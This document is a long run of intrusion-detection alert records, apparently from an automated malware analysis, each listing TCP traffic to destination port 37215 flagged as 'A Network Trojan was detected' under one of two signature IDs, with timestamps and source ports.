          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926105
          SID:2829579
          Source Port:44156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250533
          SID:2835222
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287945
          SID:2835222
          Source Port:47502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539779
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914613
          SID:2835222
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993175
          SID:2829579
          Source Port:41844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.294058
          SID:2829579
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715763
          SID:2829579
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281136
          SID:2835222
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928271
          SID:2835222
          Source Port:34094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929502
          SID:2835222
          Source Port:55188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250531
          SID:2829579
          Source Port:38594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270067
          SID:2829579
          Source Port:50910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397196
          SID:2829579
          Source Port:37382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915910
          SID:2829579
          Source Port:39764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274647
          SID:2835222
          Source Port:41354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926988
          SID:2835222
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558317
          SID:2829579
          Source Port:35860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926201
          SID:2829579
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008597
          SID:2835222
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038482
          SID:2835222
          Source Port:35178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268378
          SID:2835222
          Source Port:44544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272790
          SID:2829579
          Source Port:60906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083061
          SID:2829579
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077031
          SID:2829579
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562154
          SID:2829579
          Source Port:55328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284844
          SID:2835222
          Source Port:58720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818988
          SID:2835222
          Source Port:45212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599225
          SID:2829579
          Source Port:33334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916684
          SID:2835222
          Source Port:60408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948714
          SID:2835222
          Source Port:46130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033088
          SID:2835222
          Source Port:54136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.282282
          SID:2835222
          Source Port:42244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719853
          SID:2835222
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029788
          SID:2829579
          Source Port:50774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077223
          SID:2829579
          Source Port:35434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566079
          SID:2829579
          Source Port:39938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719970
          SID:2835222
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205520
          SID:2829579
          Source Port:48730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306415
          SID:2835222
          Source Port:59230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271282
          SID:2835222
          Source Port:56906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921920
          SID:2835222
          Source Port:39978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120766
          SID:2835222
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821941
          SID:2835222
          Source Port:41904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222544
          SID:2829579
          Source Port:36986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034794
          SID:2829579
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035369
          SID:2829579
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418961
          SID:2829579
          Source Port:58376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158402
          SID:2829579
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.956407
          SID:2829579
          Source Port:38526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159653
          SID:2829579
          Source Port:39558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819039
          SID:2835222
          Source Port:55444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398915
          SID:2835222
          Source Port:44130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677297
          SID:2829579
          Source Port:47156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714912
          SID:2829579
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716286
          SID:2829579
          Source Port:50704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477493
          SID:2835222
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412385
          SID:2829579
          Source Port:46088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396583
          SID:2829579
          Source Port:39018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227423
          SID:2835222
          Source Port:33524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869760
          SID:2835222
          Source Port:55604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820138
          SID:2835222
          Source Port:53188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157144
          SID:2835222
          Source Port:43346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602478
          SID:2835222
          Source Port:47198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165386
          SID:2835222
          Source Port:43842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715609
          SID:2835222
          Source Port:32820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564800
          SID:2829579
          Source Port:37022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947123
          SID:2829579
          Source Port:33266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162159
          SID:2835222
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717771
          SID:2829579
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100991
          SID:2829579
          Source Port:47212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869742
          SID:2835222
          Source Port:57458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251286
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163319
          SID:2829579
          Source Port:37584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413073
          SID:2835222
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947230
          SID:2835222
          Source Port:41198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294274
          SID:2835222
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417988
          SID:2835222
          Source Port:47752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567521
          SID:2835222
          Source Port:43564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104504
          SID:2829579
          Source Port:57794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719442
          SID:2829579
          Source Port:43224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029656
          SID:2835222
          Source Port:40158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010564
          SID:2835222
          Source Port:32810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411950
          SID:2829579
          Source Port:53518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205252
          SID:2835222
          Source Port:45374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222572
          SID:2829579
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166222
          SID:2829579
          Source Port:53844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821012
          SID:2835222
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724070
          SID:2829579
          Source Port:57680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082127
          SID:2835222
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294941
          SID:2829579
          Source Port:45218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035808
          SID:2835222
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246707
          SID:2835222
          Source Port:33862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160338
          SID:2829579
          Source Port:38750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398054
          SID:2829579
          Source Port:34808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012612
          SID:2829579
          Source Port:38426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.096319
          SID:2829579
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923636
          SID:2835222
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897818
          SID:2835222
          Source Port:57416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986941
          SID:2835222
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206010
          SID:2829579
          Source Port:35656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302353
          SID:2829579
          Source Port:46984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988062
          SID:2835222
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867995
          SID:2829579
          Source Port:33044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248311
          SID:2829579
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989605
          SID:2835222
          Source Port:32990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280524
          SID:2835222
          Source Port:39910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287088
          SID:2829579
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417929
          SID:2829579
          Source Port:43696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416261
          SID:2835222
          Source Port:51384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227521
          SID:2829579
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038833
          SID:2829579
          Source Port:34720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286802
          SID:2835222
          Source Port:51394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398031
          SID:2829579
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030726
          SID:2829579
          Source Port:38686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604907
          SID:2835222
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223606
          SID:2829579
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032673
          SID:2835222
          Source Port:49416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714738
          SID:2829579
          Source Port:52412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396323
          SID:2829579
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644022
          SID:2829579
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947638
          SID:2829579
          Source Port:35162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075747
          SID:2835222
          Source Port:56064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162199
          SID:2835222
          Source Port:55510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227313
          SID:2829579
          Source Port:45204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287383
          SID:2829579
          Source Port:45784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164918
          SID:2829579
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719654
          SID:2829579
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869792
          SID:2835222
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720395
          SID:2829579
          Source Port:58694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267529
          SID:2829579
          Source Port:46774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038752
          SID:2835222
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077747
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719940
          SID:2829579
          Source Port:58460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721287
          SID:2835222
          Source Port:42932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464671
          SID:2829579
          Source Port:41996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946338
          SID:2835222
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818393
          SID:2829579
          Source Port:46926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684623
          SID:2835222
          Source Port:36478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600439
          SID:2835222
          Source Port:41284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298898
          SID:2829579
          Source Port:53250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928559
          SID:2835222
          Source Port:57936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567354
          SID:2835222
          Source Port:40856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230299
          SID:2835222
          Source Port:59054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.086540
          SID:2829579
          Source Port:41998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897134
          SID:2835222
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559801
          SID:2835222
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945091
          SID:2835222
          Source Port:38972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284901
          SID:2829579
          Source Port:56290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818833
          SID:2835222
          Source Port:59628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714361
          SID:2829579
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165969
          SID:2835222
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948248
          SID:2829579
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.948834
          SID:2835222
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074694
          SID:2829579
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713770
          SID:2835222
          Source Port:47376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248211
          SID:2829579
          Source Port:38764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102495
          SID:2829579
          Source Port:38210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078897
          SID:2829579
          Source Port:37432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298035
          SID:2835222
          Source Port:48182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035872
          SID:2835222
          Source Port:59494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822948
          SID:2829579
          Source Port:45146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165715
          SID:2829579
          Source Port:43018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636084
          SID:2835222
          Source Port:47384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718053
          SID:2835222
          Source Port:37220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414950
          SID:2829579
          Source Port:46940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925419
          SID:2835222
          Source Port:44908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159389
          SID:2829579
          Source Port:46474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286398
          SID:2835222
          Source Port:47486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155867
          SID:2829579
          Source Port:57272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208107
          SID:2835222
          Source Port:56736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541453
          SID:2829579
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676355
          SID:2835222
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538164
          SID:2829579
          Source Port:48956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012735
          SID:2829579
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289863
          SID:2829579
          Source Port:43772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297739
          SID:2835222
          Source Port:47482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562165
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929151
          SID:2835222
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644560
          SID:2835222
          Source Port:47092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944741
          SID:2835222
          Source Port:47120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717856
          SID:2829579
          Source Port:59140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860492
          SID:2835222
          Source Port:43900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993204
          SID:2835222
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603788
          SID:2829579
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278960
          SID:2829579
          Source Port:56886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357546
          SID:2829579
          Source Port:36794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073847
          SID:2829579
          Source Port:60836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395789
          SID:2829579
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399120
          SID:2829579
          Source Port:37904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473653
          SID:2835222
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131302
          SID:2829579
          Source Port:36586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077090
          SID:2835222
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032952
          SID:2829579
          Source Port:52404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987186
          SID:2835222
          Source Port:52218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538531
          SID:2829579
          Source Port:37202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931867
          SID:2829579
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
